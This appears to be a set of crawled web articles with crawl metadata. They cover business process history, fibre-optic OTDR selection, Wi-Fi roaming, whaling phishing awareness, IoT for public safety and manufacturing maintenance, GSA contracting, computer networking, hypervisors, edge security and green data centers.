peculiar business, they certainly could not each of them have made twenty, perhaps not one pin in a day” Adam Smith was right and it became the basis of how we do work today – functions designed to complete specific tasks. But as companies, products and marketplaces became more complex and segmented, so became the need to have more complex and specialised functions within organisations. As process people we are now all acutely aware of the challenges that this brings for organisations to manage the flow of work across these functional specialities. The division of labour and the specialisation of work functions provided a totally new way of working and had a major role in the industrial revolution – but it has now become both a blessing and a curse for organisations. Now and into the future the ability to manage processes across increasingly complex organisations will become imperative. This blog was originally published on The Process Ninja.
<urn:uuid:80414f4c-45c0-4d1d-8879-aa86968ac4bc>
CC-MAIN-2022-40
https://www.bpmleader.com/2012/01/17/process-learning-the-division-of-labour/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00669.warc.gz
en
0.975885
860
2.765625
3
An OTDR (Optical Time Domain Reflectometer) is a fiber optic tester for the characterization of optical networks that support telecommunications. The purpose of an OTDR is to detect, locate, and measure elements at any location on a fiber optic link. An OTDR needs access to only one end of the link and acts like a one -dimensional radar system. By providing pictorial trace signature of the fibers under test, it’s possible to get a graphical representation of the entire fiber optic link. An OTDR can be used to measure optical distance including locations of the elements like splices, connectors, splitters, multiplexers and faults, as well as end of fiber. Loss and Optical Return Loss (ORL)/Reflectance, such as loss of splices and connectors, ORL of link or section, reflectance of connectors and total fiber attenuation can also be tested by OTDRs. Not all OTDR are made the same. There are various kinds of OTDR models available, addressing different test and measurement needs. The choosing of an OTDR is based on applications. By thinking of the following questions, you can roughly know what kind of OTDR you need. - What kind of networks will you be testing? LAN, metro, long haul? - What fiber type will you be testing? Multimode or single-mode? - What is the maximum distance you might have to test? 700 m, 25 km, 150 km? - What kind of measurements will you perform? Construction(acceptance testing), troubleshooting, in-service? Fiberstore offers you 7 factors to help you figure out which OTDR best fits your applications. - Size and Weight: important if you have to climb up a cell tower or work inside a building. - Display Size: 5″ should be the minimum requirement for a display size; OTDRs with smaller displays cost less but make OTDR trace analysis more difficult. - Battery Life: an OTDR should be usable for a day in the field; 8 hours should be the minimum. - Trace or Results Storage: 128 MB should be the minimum internal memory with options for external storage such as external USB memory sticks. - Bluetooth and/or WiFi Wireless Technology: wireless connectivity enables easily exporting test results to PCs/laptops/tablets. - Modularity/Upgradability: a modular/upgradable platform will more easily match the evolution of your test needs; this may be more costly at the time of purchase but is less expensive in the long term. - Post-Processing Software Availability: although it is possible to edit and document your fibers from the test instrument, it is much easier and more convenient to analyze and document test results using post-processing software. Before selecting an OTDR, consider the applications that the instrument will be used for and check the OTDR’s specifications to ensure that they are suited to your applications. Fiberstore OTDRs are available with a variety of fiber types and wavelengths, including single mode fiber, multimode fiber, 1310nm, 1550 nm, 1625 nm, etc. It also supplies OTDRs of famous brands, such as JDSU MTS series, EXFO, YOKOGAWA AQ series and so on. You can find the OTDR best fit your applications in Fiberstore.
<urn:uuid:ea6e82bd-8b83-4432-a5d6-0773a4cf9037>
CC-MAIN-2022-40
https://www.fiber-optic-cable-sale.com/7-factors-to-consider-before-selecting-an-otdr.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00669.warc.gz
en
0.894682
694
3.0625
3
Roaming is a client side decision in 802.11 WiFi. Client devices listen for beacon frames or send probe requests to discover APs advertising the preferred SSID. The clients driver uses the received signal strength of beacons or probe responses to make decisions on whether to change APs or remain connected to the current AP. In terms of roaming, there are several points to keep in mind: - Wireless clients may not roam until received signal dips below a specified proprietary threshold on the wireless NIC. In this instance, client 1 associated to AP 1 will not roam to AP 2 despite AP 2's probe response reflecting a higher RSSI value. - Attenuation due to free space path loss in an open environment is typically easier to predict. However, indoors RF scattering and reflection can create sources of multipath interference. While physical proximity between client and AP has a large impact on RSSI, it is not the only factor. - If a client device is having trouble roaming (e.g., hanging on to an AP too long), it may be desireable to toggle the device's roaming aggressiveness to a higher setting. The screen shot below shows where this parameter can be set on a Windows 7 laptop. Note: Figure 1 is only an example of where the roaming aggressiveness settings are on a client machine, the settings may be somewhere else or managed in a different fashion based on the NIC in use. Note: Apple products do not have roaming aggressiveness settings. Figure 1: Roaming aggressiveness settings for a Windows 7 laptop using an Intel Centrino wireless card. Navigate to the device manager under the control panel settings
<urn:uuid:5e6e3d56-d9e9-4955-ba9a-fd801ce60e39>
CC-MAIN-2022-40
https://documentation.meraki.com/MR/WiFi_Basics_and_Best_Practices/Client_roaming_and_connectivity_decisions_explained
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00069.warc.gz
en
0.908366
331
2.640625
3
“Whaling” phishing fraud attacks target the C-suite of a company which creates high risk of extremely sensitive, mission-critical data being stolen and exposed. Fortunately, protecting the organization from these attacks is possible. Whaling phishing is a type of phishing attack targeting larger, high-value targets, which is why it's called "Whaling." Attackers themselves often pretend to be C-suite executives in emails to colleagues asking for personal or company information. What Exactly is Phishing? Phishing is when a bad actor pretends to be someone else through either email or text message in order to trick the recipient into leaking their information, or installing malware. These attacks in general have risen sharply over the years and are one of the biggest threats to network security. Attackers impersonate well-known brands, and in the case of whaling, pretend to be a trusted leader inside an organization in order to trick recipients into clicking on malicious links or sending sensitive information. Attackers use a number of different methods to hide their true identity when phishing. Some of those methods include: - Sending emails from a spoofed domain - Sending emails from a lookalike domain - Using stolen brand images in the email to convey trust - Using stolen email signatures to look legitimate - Hiding malicious embedded links inside innocent looking URLs - Using scare tactics and urgency to get recipients to act - Pretending to be a key figure within an organization to get recipients to act While there are plenty of methods attackers use to phish unsuspecting victims, there are equally just as many strategies companies can use to implement phishing defenses. Let’s take a look at the different types of phishing attacks, and how they compare to whaling. Phishing vs. Whaling - What’s the Difference? Simply put, whaling is a more targeted form of spear phishing that exploits the trust of recipients by pretending to be a known authority figure within a company. For example, attackers will pretend to be a C-level staff member in an organization, and use that authority to pressure employees and colleagues to take a specific action. These actions can range from sending over financial statements, clicking on fraudulent links, or even wiring money to unknown accounts. Many phishing attacks are done indiscriminately and are sent to thousands of different people at once. Email scams are a numbers game, so attackers will send emails in bulk knowing only a small percent will fall for the scam. Whaling, however, takes the complete opposite approach, and focuses on researching particularly lucrative targets like enterprise organizations. Attacks are well planned and often use scraped or stolen information in order to make the fake message appear more legitimate. A common technique used by phishers is to pull names, email addresses and phone numbers from a company website. This helps the scammers understand the hierarchy of the organization and aids them in planning who they will impersonate. To better understand how whaling differs from other forms of email attacks, let's take a brief look at the different types of phishing attacks. Email phishing is the most common type of email scam, and is often what people refer to when they talk about phishing in general. It’s estimated that nearly half of all emails sent contain some sort of phishing attack. These emails can vary in messaging but often pretend to be a legitimate company, or person an organization does business with often. Fake password resets, phony invoices and bogus shipping updates are among the most common types of email phishing attacks. Spear phishing focuses its attack on a single organization and uses research gathered online to impersonate companies or individuals that a company frequently does business with. Attackers can impersonate either a trusted third party, or someone that works inside of the target company. These attacks will target single departments or individuals to try and compromise the company. Everything from the subject line, to the name of the sender can all be tailored and customized to be as familiar to the target as possible. While email phishing may cast a wide net to try and catch many fish, spear phishing uses a single spear to target one very lucrative fish. Smishing is an attack that uses text messaging (SMS) in order to deliver a harmful message. These can be either targeted attacks or widespread phishing campaigns that attempt to trick users into clicking fake links and entering their information. The most common forms of smishing are fake shipping updates, customer rewards, and, especially recently, messages impersonating the IRS regarding stimulus check updates. Vishing is when an attacker uses voice communications to steal information. These usually take the form of a voicemail message claiming that the recipient owes money, has been hacked, or is in legal trouble with the IRS. The goal of these scams is the same of every scam, to obtain information or funds illegally. Vishing can also take place if a user calls a fake number. Malicious websites create fake pop ups claiming a computer has been hacked, and scaring the user into calling the ‘tech support’ number for assistance. In reality the computer is not hacked, but after a phone call the fake tech support scammer will establish a remote connection and either infect the machine, or pretend to fix the problem in exchange for a fee. Example of Whaling in Action What does a Whaling attack look like? Let’s run a mock scenario. After weeks of research, attackers have gathered information on ABC Company and are ready to begin their Whaling campaign. They know the names and email addresses of the C-level staff members and are going to attempt to trick one of them into opening an attachment that will silently install spyware in the background. This spyware will steal company secrets, financial information, and even assets that will aid in future whaling campaigns. Attackers register a fake domain that looks exactly like ABC Company. Instead of the real abccompany.com, they create abcconpany.com — a misspelling that is tough to spot. They use that email address to impersonate the CEO, and send an email to the accountant. The message states that an invoice is overdue and urgently needs to be paid. The attachment looks like a real PDF invoice, but is actually a payload that will install malware once opened. To make matters worse the account numbers in the fake invoice are to the attacker's company, meaning not only does the account install malware, but they also send money to the attacker. Consequences of Whaling Whaling can have a devastating impact on organizations of all sizes, as the attack focuses on stealing the most sensitive forms or data and financial information. Unlike traditional phishing, highly valuable information such as tax returns and bank account numbers are targeted. This can lead to fraudulent wire transfers, stolen identities, and even more coordinated follow-up attacks. How Can I Defend Against Whaling? Preventing phishing, or more specifically Whaling, is never as simple as installing a program. It takes a dedicated phishing response plan in order to remain protective and minimize the impacts of phishing attacks. Here are a few steps you can take to prevent whaling: - Implement email rules that tag external emails as “outside of the organization.” This helps users know right away when an email is coming from outside the company. This capability is often part of a larger data loss prevention (DLP) solution, such as Clearswift. - Create policies and procedures for sensitive tasks such as wire transfers or sending financial information. Having someone approve these requests or use a secondary channel helps catch phishing attempts in action before it’s too late. - Implement phishing training across your organization. Staff training uses a combination of fake phishing emails along with customized training to measure how knowledgeable staff members are in email security. - Invest in professional defense. There are a lot of moving parts when it comes to defending against whaling attacks. Companies can partner with organizations like Agari to build a phishing defense plan that prevents these attacks from ever making it to the inbox. How Do I Report a Phishing Attack? If you’ve fallen victim to an email-based scam, or have been sent a phishing email, there are a few simple steps you can use to report it. If you’ve received a phishing email, you can forward it directly to the FTC Anti-Phishing Working Group at [email protected]. If the message was a text message you can forward it to SPAM (7726). You can then report the phishing attack by visiting http://ftc.gov/complaint. The Agari Advantage Agari offers a turnkey solution to prevent whaling attacks through automatic phishing response, remediation, and containment. The system utilizes both signature-based security as well as behavioral analysis to stop malicious files and bad actors at the same time. If you’re looking to learn how to keep your business safe from whaling attacks, learn more about Agari Phishing Response.
<urn:uuid:a157ef7c-b964-43fe-b306-5a8a95cc758c>
CC-MAIN-2022-40
https://www.agari.com/blog/whaling-phishing-email-fraud
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00069.warc.gz
en
0.937654
1,893
3.109375
3
Tuesday, September 27, 2022 Published 2 Years Ago on Tuesday, Jun 23 2020 By Inside Telecom Staff Internet of things (IoT) refers to billions of devices that are connected to the internet. These devices have the ability to transfer data without human-to-human or human-to-computer interactions. According to Bain & Company, the combined markets of the Internet of Things will grow to about $520 billion in 2021. This technology has now infiltrated into our daily lives and is now providing advanced public safety solutions. The machine-to-machine communications are now reshaping public safety. Considered as a game-changer for public safety, this technology will help first responders in decision making before arriving on the scene. By using these connected devices, they can identify mission challenges and resources. In case of fire on a building, the traffic accident response team could use the data collected from IoT connected devices such as vehicles, surrounding infrastructures, and victims. On the other hand, IoT sensors could notify citizens on their phones about an emergency so they can leave the location. In July 2019, the European Telecommunications Standards Institute (ETSI) published a technical report entitled “Study of use cases and communications involving IoT devices in the provision of emergency situations” which highlighted the importance of Drones as special IoT devices. “Drones can be used by emergency services or disaster management agencies to monitor large fields and forests during dry spells to reduce the risk of wildfire,” states the report. The ETSI report also mentions the advantages of IoT use for environmental catastrophes. IoT devices provide an automated emergency response based on the received warning message. For example, in case of an earthquake, IoT devices can stop or deactivate an elevator. In addition, IoT devices can prevent emergencies before it arises. According to the report, when a gas pipeline reaches high pressure in a location, the IoT device informs a remote-control system to regulate the situation and to prevent an explosion. In June 2019, the National Public Safety Telecommunications Council (NPSTC) has published a report entitled “Public Safety Internet of Things (IoT)”. The report refers to the usage of IoT for incident detection such as school shootings. For example, a school in the US has implemented a new sensor and analytics technology based on a series of deadly school shootings across the country. The security camera that has been installed in the passage could visualize the presence of a handgun. After detecting the gunshot, the system sends an alert message to the school system-monitoring center that takes action. When detecting such an emergency, the alarm pull stations at the school are automatically disabled to prevent evacuation of students into open areas. If the gunman ran to another building, an update on his location will be sent to the system. Internet of things locates people in danger including hikers. By wearing IoT connected devices, hikers can take comfort as emergency officials can rapidly detect their locations. The world of foldable phones keeps welcoming more additions to its roster. And it makes sense. The foldable phones are selling well even with their pricy asking point. Huawei’s latest foldable is the Huawei P50 Pocket. While it does many things right, it also has its shortcomings. We will take a deeper look at it. […] Stay tuned with our weekly newsletter on all telecom and tech related news. © Copyright 2022, All Rights Reserved
<urn:uuid:00fac4de-8f82-4ac3-a152-37275eb96963>
CC-MAIN-2022-40
https://insidetelecom.com/iot-an-essential-tool-for-enhancing-public-safety/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00069.warc.gz
en
0.944595
718
2.859375
3
The factory floor, once viewed as a retro throwback to an earlier industrial-based economy, is getting a big makeover, and in many ways is now on the cutting edge of technology. It’s one of the Internet of Things (IoT) major showplaces. And it’s moving beyond that, with the increasing popularity of Computerized Maintenance Management Systems (CMMS). The integration of CMMS and IoT is clearly the future of manufacturing — and mobile is as well. First, a brief primer on CMMS. The systems use real-time performance metrics, data acquisition and production analysis to make sure a factory runs as efficiently as possible by schedule and tracking maintenance and keeping a historical record of all maintenance done. By doing that, they can solve problems before they even start. They’re a big leap over the traditional paper-based ways of scheduling and tracking maintenance. IoT is playing a larger role in CMMS. IoT devices can be deployed everywhere in a factory, not just on manufacturing devices, but also to do things such as measure temperature, humidity and other environmental factors. They can measure an astonishing number of variable, down to the vibration levels of equipment. Massive amounts of IoT data are fed into a CMMS, and analysis is done to make sure everything is running the way it should. Predictive analytics can be used to peer into the future and see potential issues. The CMMS can then be used to resolve them. CMMS can dramatically reduce maintenance costs, of course. The marine division of Caterpillar, for example, uses shipboard IoT sensors to gather data about generators, engines, GPS, air conditioning systems and fuel meters. It pumps all that data into a CMMS and looks for ways to improve the functioning of the ship. For example, Caterpillar did an analysis of generators that power its refrigerated containers and found that if it ran more generators at lower power, it would save money compared to using fewer generators at higher power. The results: $650,000 in savings a year. The combination of a CMMS and IoT can do much more than that, though. By making sure the factory runs smoothly, they can increase its output and reduce downtime. That can add many millions of dollars to a company’s bottom line. Mobile apps are a key component of IOT-CMMS integration. A mobile CMMS can send alerts to maintenance workers’ mobile device to tell them when a system needs maintenance. Mobile apps can function as dashboards to help run the factory. Workers can carry around mobile apps that gather sensor data at the source. There are plenty more applications as well. At Alpha Software, we’re big believers in both IoT and CMMS, and especially in their integration. Alpha Anywhere is already being used on the factory floor, to build offline field service apps and inspection apps, which are integral components of a CMMS. - Build mobile manufacturing apps: Learn about the Alpha TransForm solution for quality management, including quality control and quality assurance. - A Recent Survey Shows Why You Need a Mobile CMMS - Read How IOT Coupled with an EAM CMMS Solution Can Help Managers and Engineers Execute Tasks Properly and Efficiently
<urn:uuid:28b6b285-830f-4d83-bd2c-2ec5720abcda>
CC-MAIN-2022-40
https://www.alphasoftware.com/blog/iot-cmms-integration
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00069.warc.gz
en
0.935535
671
2.65625
3
This article will provide a comprehensive GSA guide: Here are GSA Contracts for Dummies. President Harry S. Truman founded the GSA in 1949 to streamline federal procurement and administrative operations. The GSA has evolved significantly since the late 1940s and is currently America’s sole supplier for federal products and services. The General Services Administration (GSA) manages federal procurement, relieving other federal agencies of administrative duties. Bought by the federal, state, and municipal governments at pre-negotiated prices, GSA awards long-term governmentwide contracts to businesses hoping to make it big in the government space. What is a GSA Schedule? GSA provides products and services that help federal agencies serve the public. The GSA Schedules initiative reduces lead times and increases vendor transparency. The Federal Acquisition Service (FAS) provides comprehensive products and services across government with taxpayer dollars. For a GSA Multiple Award Schedule (MAS) contract, a proposal must get submitted that meets the requirements of the GSA. Moreover, companies can apply for GSA Schedules, allowing them to enter the federal market whenever they want. Click here to calculate ROI! One major distinction between selling commercially and selling through a GSA contract is the agreed-upon terms and conditions negotiated during the GSA Schedule acquisition procedure. Having established terms and conditions simplifies the purchase process for federal agencies. By holding a GSA contract, federal organizations get assured that your rates and business have gotten examined thoroughly, allowing them to purchase from you. The Benefits of GSA Contracts As part of the GSA Contracts for dummies, some of the most notable benefits await government agencies and contractors. Government agencies enjoy a variety of benefits when they utilize the GSA Schedules Program, including: Reduced Administrative Costs Government customers receive the greatest value and assurance that the vendor has been verified and has met the conditions for competitive bidding on its products and services. Additionally, businesses can purchase new goods and services more efficiently than conventional contracts, resulting in shorter lead times. Government customers benefit from competitive market-based pricing, which takes advantage of the federal government’s purchasing power. They have the potential to negotiate further discounts at the order level. Enjoy Flexibility of Choice Government customers can modify terms and conditions at the order level through GSA Schedules and have access to a large number of contractors who provide specialized solutions for services and goods through the program. Cut Time Requirements Government customers benefit from rapid and easy access to the appropriate industry partners, enabling them to make the best use of their precious time. Additionally, contracts get awarded in days rather than months. Customers in the government sector benefit from electronic access to competent contractors and aid in achieving social goals. Additionally, when they utilize GSA e-Tools, they can incorporate business intelligence into their purchase behaviors. Contractors or Vendors Additionally, the GSA Schedules Program provides numerous incentives to small firms and vendors: More Business Opportunities Because the GSA is a major purchaser of products and services from small businesses, opportunities are increasing. GSA contracts also result in enhanced awareness and reputation for your company. Provide Equal Opportunities Small firms account for 80% of all GSA Schedule holders. Small disadvantaged businesses, women-owned businesses, HUBZone (Historically Underutilized Business Zone) enterprises, veteran-owned businesses, and service-disabled veteran-owned businesses are among the groups who will benefit from the expansion of opportunities for them. Create Long-Term Business Opportunities Contract terms can be as long as five years, with a maximum of three five-year renewal options available. This option could result in a contract with the government for your products and services for 20 years. Present a Wide Range of Products or Services You can find your product or service among the more than 11 million commercial items available for purchase. Allow Healthy Competition The GSA Schedule has more than 19,000 contract holders listed on it. Even though this figure is considerable, the actual number of competitors in your field of expertise may be significantly lower. How to Get on the Schedule Here is how to get GSA Contracts for dummies: Step 1: Obtain a Copy of the Solicitation Package Download the most current revision of the MAS IT Solicitation. The solicitation package guides industry partners to sell IT products, services, and solutions to federal, state, and local government customers. By replying to this solicitation, you may acquire a MAS IT contract. This stipulation allows your company to benefit and expand. Do not forget to read the solicitation package and its attachments before responding, as it has more instructions. Step 2: Prepare Your Proposal As requested, gather key organizational documents such as financials, catalogs, pricing lists, brochures, and organization charts. If you have any questions while you prepare your offer, feel free to contact the IT Schedule Programs Office for clarification. Step 3: Submit Your Offer The eOffer system allows potential industry partners to make an electronic offer to the most recent request by completing a step-by-step approach. Moreover, eOffer enables an online, paperless contracting environment that meets FAR rules and environmental aims. Industry partners must use the eOffer system to submit offers. For more information, you may visit the Vendor Support Center for help. Step 4: GSA will Review Your Offer Once your offer gets submitted to GSA, it will get reviewed by a contracting officer. The contracting officer will serve as a guide for you during this process. Following the initial evaluation, the contracting officer will negotiate the contract’s terms and conditions, including the contract’s price. The government will give a GSA Schedule contract if all conditions get met, the prices are reasonable, and the offer is in the government’s best interests. Step 5: Keep and Maintain Your Contract Following the contract award, an industry partner will frequently need to change some contract information. The GSA eMod system permits industry partners granted a GSA Schedule contract to submit electronic contract adjustments. No matter how tough or daunting the GSA Schedule acquisition procedure appears to be, completing it will increase your chances of obtaining better opportunities. Offering your products and services to the federal government can be overwhelming. Still, with the right tools and advisors on your team, you can achieve your objective of being awarded a GSA Schedule Contract. Hopefully, you have found this GSA Contracts for Dummies guide to assist your next business endeavor.
<urn:uuid:8994932c-0144-4471-9968-854097116d46>
CC-MAIN-2022-40
https://www.gsascheduleservices.com/blog/gsa-contracts-for-dummies/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00069.warc.gz
en
0.930257
1,363
2.734375
3
Computers can be connected, or networked, to one another through cable or wireless technologies, enabling communications and data and resource sharing. A network can be limited to a single building, or spread across the entire globe. Local Area Network (LAN) A local area network (LAN) is a group of computers connected together to share files and other resources such as printers. All computers or workstations in the system are usually connected to a powerful computer known as the file server. See Figure 1. The file server provides the software and data files to which the workstations commonly need access. A network system is designed to save money and time. Databases are easily shared and files are easily accessed from a single location. Networks are common in businesses and educational settings. Figure 1. A simple client/server network. In addition to the network operating system software on the server, network client software is required on each workstation to complete communications between the workstations and the file server, printers, and modems on the LAN. The network operating system software also provides security. A network administer uses special utility programs to set up user passwords and to limit access to certain resources and files. Wide Area Network (WAN) A wide area network (WAN) is simply an expansion of a LAN. LANs are typically set up in a single building and connected by copper or fiber-optic cable. A WAN network can have stations many miles apart. The WAN network depends on routers, a hardware or software device that determines the best route for the information to take, Figure 2. The router sends signals over telephone lines or via satellite to tie the computers and information together. Through the WAN, users have instant access to all programs and information contained in the network. A network administrator can also manage WAN security. Figure 2. Routers route data traffic across the entire world. As you can see, there are several routes that can be chosen to send a data packet from ACME, Inc. to ZZZ, Inc. The job of the router is to select the best route. This is determined by the amount of data to be sent, the status of the other networks the router is connected to, and then the quickest route. The Internet, or World Wide Web (WWW), is such a technology, most of us use it daily. As an electronic technician you will need to use it often for product information, specifications, research, and for many other segments of your work. The resources available through the Internet are virtually unlimited. To access the Internet, a user needs only a service provider, a modem for transmission, a Web browser (a program that allows the user to navigate, view, and interact with the Internet), and some basic knowledge of how the system works. Many Internet providers give free access time to allow a user to try the system. Wireless technology has made the Internet and many of its functions completely portable. Business can be conducted from nearly anywhere in the world, and transactions, messages, and many other types of communications can be accomplished from remote locations. Digital Subscriber Line (DSL) is a high-bandwidth Internet connection that uses a regular phone line. This means any phone line installed recently will support DSL. You must also be within a specific distance to the telephone company office in order for DSL to work properly. DSL is a point- to-point connection, which means it will provide a steady bandwidth and will not fluctuate like other broadband connections. The required components for a DSL connection are shown in Figure 3. Figure 3. The basic parts necessary to establish a DSL connection. Some DSL modems use a USB cable and connect to the PC USB port. No network adapter is required if a USB cable is use Other equipment that may use the same DSL line as the PC include fax machines and telephones. The use of either of these devices requires a filter to be installed as well. The filter prevents lower frequency signals to and from the fax machine or telephone from interfering or corrupting the higher frequency signals used for the PC Internet connection. The cable modem is similar to the DSL modem. It allows existing cable television coaxial cable to be used for Internet access. See Figure 4. The cable modem is installed between a coaxial cable splitter and the PC. This configuration allows the cable to supply a television signal to the television while providing Internet access to the PC. The coaxial cable connects to the cable modem from the splitter. More than one PC can utilize the cable Internet connection if a router or gateway is installed. Some cable modems are a combination modem and router or gateway. Figure 4. Basic cable modem connections. 1. A LAN is a collection of computers connected to a file server for sharing data, and software. 2. The Internet is a system using both hard wire and wireless technology connecting together computers all over the world.
<urn:uuid:e70e68df-0b9e-4014-981f-25d9f4ee2945>
CC-MAIN-2022-40
https://electricala2z.com/electronics/lan-wan-internet-explained/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00069.warc.gz
en
0.922556
1,022
3.6875
4
If you still don’t know the term hypervisor, do not be fooled, this technology is not so recent. It emerged in the 1970s, boosted by innovative technologies at the time of the giant IBM. The solution created to reduce costs consisted of consolidating multiple computers from different departments into a single central machine, a mainframe. In this way the hypervisor created in this mainframe allowed the execution of multiple operating systems and, even if there were flaws in one of them, the others remained stable. At this time, when computers were huge and boiled down to robust mainframes, there was no easy way to download, install, and use software on any machine. The software was developed almost exclusively for the model for which it was designed. So, the hypervisorsif the virtual machines have gained strength and have become essential solutions for technology companies. Continue reading this content and understand a little more about the hypervisors! How does the hypervisor work? A hypervisoris basically a layer of software located between the hardware and the operating system. Through it, several virtual machines can have access to hardware resources such as CPU, memory, network, storage, and so on. In addition, this feature can ensure greater security for virtual machines from mechanisms such as isolation, tunneling, and partitioning. One of the best-known advantages of a hypervisoris the ability to emulate multiple operating systems on the same machine. In this way the IT department does not need to allocate resources in the acquisition of several physical units, being able to divide the processing power of one among several virtualized systems. This allows for high portability and flexibility. This type of solution has regained its strength because of the ease with which it allows the IT department to manage several servers and applications independently, even using the same hardware. For example, you can test an application in isolation, without running the risk of malware affecting other applications and system functionality. What types of hypervisor exist? There are two types of hypervisors: bare-metal and hosted. If you have ever used any application that emulated a virtual machine on your desktop, such as Oracle VirtualBox, VMware: Workstation, QEMU, Microsoft: Virtual PC, Virtual Server or similar, you then used a hosted hypervisor. This option is commonly intended for use on personal desktops and runs through software running on an operating system. For example: in a Windows operating system you can run a virtual machine that simulates a Linux operating system with all its functionality. It works inside a window, and it is possible to use native OS applications, such as a web browser, in parallel with the virtualized environment, which is not possible in the bare-metal type. The host option can provide high hardware compatibility, which allows virtualization software to perform a wide range of configurations. In turn, the bare-metal option manages to provide a variety of I / O access options ensuring greater performance. This is possible because the hypervisorlayer, in this option, comes just above the hardware layer, operating independent of the operating system, which comes next. The image below shows in a didactic way the difference between the two types of hypervisorarchitecture. Does your business need a hypervisor? If you need to get more computing, but do not want to invest in the purchase of more physical machines, wishing to take full advantage of your servers, the hypervisorand its virtual machines are essential solutions for your business. In practice, they offer the same results as any other computer, but they do not exist physically, only logically and can be used for a variety of purposes, such as running ERP systems, cloud computing services, simulation tools, among others. In short, a hypervisorcan bring numerous benefits such as centralized management, rapid deployment, ease of migration and expansion, the ability to create a test environment, and thus more security and reliability. Now it’s up to you, the manager or IT professional, to identify the real needs of your business and evaluate whether deploying a hypervisor is necessary. And if you still have questions, please contact us through the comments or our contact form. Our team is prepared and eager to ensure the safety and success of your business.
<urn:uuid:e94eb2f2-fbc5-434e-9de6-acb64d6ae5b8>
CC-MAIN-2022-40
https://ostec.blog/en/general/what-are-hypervisors/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00069.warc.gz
en
0.939548
870
3.34375
3
What Is Edge Security? | Buzzwords Edge security is an increasingly important aspect of any corporate network. In the simplest terms, edge security means protecting your most vulnerable devices at the “edge” of your network. As the Internet of Things takes over and becomes an ever-present part of our personal and working lives, the number of endpoints has risen exponentially—and with it the number of attack vectors. Malicious actors have wasted no time directing their efforts towards exploiting IoT devices, which today can be virtually anything—from phones to laptops and TVs to fridges. Edge security as a result is very important to SMBs and enterprises looking to protect their data. Watch this explainer video as we break down edge security and go over everything you need to know about this fast-emerging field of cybersecurity. Find out more below: The Buzzword series features short videos that break down popular topics focused on business and technology. Each video takes a look at a top trend, and why you may want to incorporate it into your organization. View the full series here. More on business cybersecurity What Is Secure Access Service Edge (SASE)? What is Secure Access Service Edge and how can it help protect your business from modern cyberthreats? Find out here. Pandemic Cyberattacks Are Driving Tech Adoption Pandemic cyberattacks have been a major issue in 2020, and businesses are responding with investment, but what tools are they adopting most frequently? Find out here. Why You Need Layered Security The cybersecurity challenges of today continue to show why SMBs can’t rely on simple security. Find out about layered cybersecurity here.
<urn:uuid:d1a7b1d5-c8f9-40c4-b8e1-e9d19cbf516f>
CC-MAIN-2022-40
https://www.impactmybiz.com/videos/what-is-edge-security-buzzwords/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00069.warc.gz
en
0.929521
344
2.65625
3
Thank you for Subscribing to CIO Applications Weekly Brief The Importance of Green Data Centers Data centers have an ethical responsibility to be change agents and play a critical role in enacting policies that reduce the environmental impact of data storage. FREMONT, CA: Sustainability takes on a more intense and inventive approach for the data center business, responsible for at least 1 percent of global energy consumption. Data centers, like businesses, have a need to develop and promote more sustainable choices and solutions due to the sheer size and scope of their operations. Moreover, if we consider these hubs to be the epicenter of connectivity, data storage, and processing, as well as a range of business-critical applications, it’s only natural to assume that data storage and internet usage will continue to rise in the coming years. It could even be claimed that data centers have an ethical responsibility to be change agents and play a critical role in enacting policies that reduce the environmental impact of data storage. Some companies have already pledged to decrease their environmental footprint and invest in more sustainable energy solutions as part of their long-term green plan. Many initiatives are being taken to reduce data center energy usage, but if consumption is to be kept to a minimum, this process will need to be accelerated, especially when considering that data usage grew by 47 percent in the first quarter of 2020, during the first COVID-19 lockout. Data compression’s key benefit is that compressed files take less time to transfer and use less network bandwidth. Less storage capacity is required as file size, data transmission time, and communication bandwidth are reduced, resulting in lower energy usage, higher productivity, and significant cost savings. Immersion cooling, on the other hand, is a more realistic approach to tackling energy inefficiency issues. The procedure involves immersing computer components or entire servers in a dielectric liquid that allows for better heat transmission than air. 4D recently adopted this technique, installing a very energy-efficient “pod” at its Gatwick location that utilizes immersion cooling technology. The “pod” employs a biodegradable dielectric fluid with half the density of water and heat exchangers to keep IT equipment cool. Intercoolers and water are utilized to keep the fluid cool, and an internal heat exchanger takes heat from the fluid and redistributes it into chill water, which is then pumped out and cooled down again in 4D’s adiabatic cooling towers, a method similar to that used in the automobile sector. One option to make data centers more environmentally friendly is to use renewable energy sources. Because electricity is the primary source for conducting daily operations, the environmental impact of a single data center will be primarily decided by where it gets its electricity. This means that, depending on their resources and location, data centers may be able to design a more ecologically friendly system, such as using wind, solar, or even tidal energy. By embracing sustainability, data centers have a real chance to impact change. Committing to a green agenda is a positive step for any organization, but to be sustainable, business owners must guarantee that energy efficiency is at the forefront of every facet of how a data center is run. Business owners can manage their data centers smartly and cleanly by finding the most sustainable materials and technology for developing and managing these energy-intensive hubs, ensuring that their impact on the environment is minimized as data consumption continues to grow.
<urn:uuid:816bb1c5-b109-4127-b711-f0c8630f95fd>
CC-MAIN-2022-40
https://www.cioapplications.com/news/the-importance-of-green-data-centers-nid-8578.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00269.warc.gz
en
0.942048
703
2.828125
3
